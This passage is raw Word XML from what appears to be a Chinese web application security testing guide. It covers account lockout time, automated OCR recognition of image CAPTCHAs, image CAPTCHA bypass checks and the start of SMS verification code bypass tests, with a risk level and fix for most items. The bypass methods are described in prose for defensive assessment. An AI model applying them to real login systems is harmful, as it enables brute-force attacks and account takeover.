        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：账户在多次尝试失败后锁定时间低于</w:t>
      </w:r>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分钟</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3684EBA6" w14:textId="470DD6CA" w:rsidR="009145B3" w:rsidRDefault="009145B3" w:rsidP="00395BDF">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00ED48BB" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议在不影响业务的前提下，账户在多次尝试失败后锁定时间不低于</w:t>
      </w:r>
      <w:r w:rsidR="00ED48BB" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00ED48BB" w:rsidRPr="00395BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分钟。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B98EE70" w14:textId="2748DB9F" w:rsidR="000C0F87" w:rsidRPr="00395BDF" w:rsidRDefault="000C0F87" w:rsidP="00395BDF">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6E37684" w14:textId="0B96DE21" w:rsidR="009145B3" w:rsidRPr="00A82BA3" w:rsidRDefault="002F529D" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc498434526"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图形验证码可自动获取</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="4BE1201A" w14:textId="71791ECA"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00185923" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图形验证码过于简单，可使用工具自动化识别。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AF70C3" w14:textId="01F76AC5"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测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00E03899" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidR="00E03899" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python Image Library</w:t>
      </w:r>
      <w:r w:rsidR="00E03899" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00E03899" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tesseract-ocr</w:t>
      </w:r>
      <w:r w:rsidR="00E03899" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00E03899" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pytesser</w:t>
      </w:r>
      <w:r w:rsidR="00E03899" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidR="00E03899" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidR="00E03899" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三方库，经过二值化、文字分割等操作识别验证码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E1A011" w14:textId="1289EFD8" w:rsidR="009145B3" w:rsidRPr="00067578" w:rsidRDefault="00C24790" w:rsidP="00067578">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="009145B3" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00897AB1" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>验证码通常使用一些线条和一些不规则的字符组成</w:t>
      </w:r>
      <w:r w:rsidR="00897AB1" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00897AB1" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>这些字符通常同时包含字母和数字</w:t>
      </w:r>
      <w:r w:rsidR="00897AB1" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00897AB1" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>但有些</w:t>
      </w:r>
      <w:r w:rsidR="00897AB1" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00897AB1" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>程序设计的验证码较简单</w:t>
      </w:r>
      <w:r w:rsidR="00897AB1" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，仅由数字或字母组成，且生成的验证码字符排列规整，很容易被程序自动识别。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C66499"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670E12CD" w14:textId="694B4EA3" w:rsidR="009145B3" w:rsidRPr="00067578" w:rsidRDefault="00F32B6B" w:rsidP="00067578">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：图形验证码可被自动化识别，且成功率高于</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>95%</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF8396B" w14:textId="3317900C" w:rsidR="009145B3" w:rsidRDefault="009145B3" w:rsidP="00067578">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00743C61" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用安全性强的验证码，验证码应从以下方面保证其安全性：验证码长度不低于</w:t>
      </w:r>
      <w:r w:rsidR="00743C61" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00743C61" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位，至少同时包含数字、字母或汉字，增加干扰因素比如线条，避免使用容易被程序自</w:t>
      </w:r>
      <w:r w:rsidR="00743C61" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>动识别的验证码，验证码不应返回到客户端。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311E2C6B" w14:textId="1CF2E698" w:rsidR="000C0F87" w:rsidRPr="00067578" w:rsidRDefault="000C0F87" w:rsidP="00067578">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78D71C9E" w14:textId="5715397C" w:rsidR="009145B3" w:rsidRPr="00A82BA3" w:rsidRDefault="002F529D" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc498434527"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图形验证码绕过</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="7A62E0F8" w14:textId="17BDEC8E"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00825BE9" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图形验证码可被绕过，执行暴力破解等操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5D8919"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7545104E" w14:textId="14DB0162"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验证码和用户名、密码是否一次性、同时提交给服务器验证，如果是分开提交、分开验证，则存在漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758F7AC4" w14:textId="77777777"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在服务器端，是否只有在验证码检验通过后才进行用户名和密码的检验，如果不是说明存在漏洞。（检测方法：输入错误的用户名或密码、错误的验证码。观察返回信息，是否只提示验证码错误，也就是说当验证码错误时，禁止再判断用户名和密码。）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C65A9EA" w14:textId="56BF0290"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验证码是否为图片形式且在一张图片中，不为图片形式或不在一张图片中，说明存在漏洞，完成检测</w:t>
      </w:r>
      <w:r w:rsidR="00923145" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03344177" w14:textId="574EA826"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生成的验证码是否可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源代码查看到，如果可以说明存在漏洞，完成检测</w:t>
      </w:r>
      <w:r w:rsidR="00B9329F" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C02257" w14:textId="772B6856"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生成验证码的模块是否根据提供的参数生成验证码，如果是说明存在漏洞，完成检测</w:t>
      </w:r>
      <w:r w:rsidR="00B9329F" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F20840" w14:textId="36690D2E"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请求</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次观察验证码是否随机生成，如果存在一定的规律（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次后出现同一验证码）说明存在漏洞，完成检测</w:t>
      </w:r>
      <w:r w:rsidR="00B9329F" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2561596D" w14:textId="1B7D9225" w:rsidR="009145B3"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验证码在认证一</w:t>
      </w:r>
      <w:r w:rsidR="00462D62" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次后是否立即失效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6831B5BB" w14:textId="2ADA3691" w:rsidR="009145B3" w:rsidRPr="00067578" w:rsidRDefault="00C24790" w:rsidP="00067578">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="009145B3" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00F04BB2" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图形验证码一般是防止使用程序恶意注册、暴力破解用户名密码或者批量发帖而设置的。在页面初始化时服务器向页面发送一个随机字符串，同时在</w:t>
      </w:r>
      <w:r w:rsidR="00F04BB2" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidR="00F04BB2" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里也保存一份，当用户提交时将随机数一起</w:t>
      </w:r>
      <w:r w:rsidR="00F04BB2" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r w:rsidR="00F04BB2" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到后台，通过与</w:t>
      </w:r>
      <w:r w:rsidR="00F04BB2" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidR="00F04BB2" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中保存的值对比，如果不相同，</w:t>
      </w:r>
      <w:r w:rsidR="00F04BB2" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>则有可能是恶意攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5615A50B"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1769763C" w14:textId="2C0348C3" w:rsidR="009145B3" w:rsidRPr="00067578" w:rsidRDefault="00286901" w:rsidP="00067578">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：验证码可多次使用、发现特权验证码、前端校验、返回验证码、返回带有验证码信息的图片。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E98A1A"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C05DC8" w14:textId="77777777" w:rsidR="0066079E" w:rsidRPr="00067578"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系统在开发时注意验证识别后销毁</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的验证码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDA7069" w14:textId="77777777" w:rsidR="0066079E" w:rsidRPr="00067578"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限制用户提交的验证码不能为空</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A17532C" w14:textId="77777777" w:rsidR="0066079E" w:rsidRPr="00067578"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判断提交的验证码与服务器上存储的是否一致</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CA03F9" w14:textId="7117EE12" w:rsidR="0066079E"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禁止将验证码明文信息发送至客户端</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9B9557" w14:textId="078BA3A3" w:rsidR="008446BE" w:rsidRPr="00067578" w:rsidRDefault="008446BE" w:rsidP="008446BE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"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E4B57FC" w14:textId="745D426E" w:rsidR="0094664F" w:rsidRPr="00F757E4" w:rsidRDefault="0094664F" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc498434528"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>短信验证码绕过</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="3B60E280" w14:textId="608023FF"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00892B18" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>短信验证码可被绕过，执行其他操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDE1036" w14:textId="77777777"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78209492" w14:textId="4CD1CEA3" w:rsidR="0094664F" w:rsidRPr="00067578" w:rsidRDefault="004C5061" w:rsidP="00067578">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求</w:t>
      </w:r>
      <w:r w:rsidR="0004597F" w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送短信</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，填写任意验证码，然后提交其他操作请求，将验证码参数置空或删除，测试是否可绕过检测；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417F544C" w14:textId="409FF645" w:rsidR="004C5061" w:rsidRPr="00067578" w:rsidRDefault="004C5061" w:rsidP="00067578">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试特权验证码，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>000000</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>111111</w:t>
      </w:r>
      <w:r w:rsidRPr="00067578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidR="00E43ED4" w:rsidRPr="00067578">
        <w:rPr>
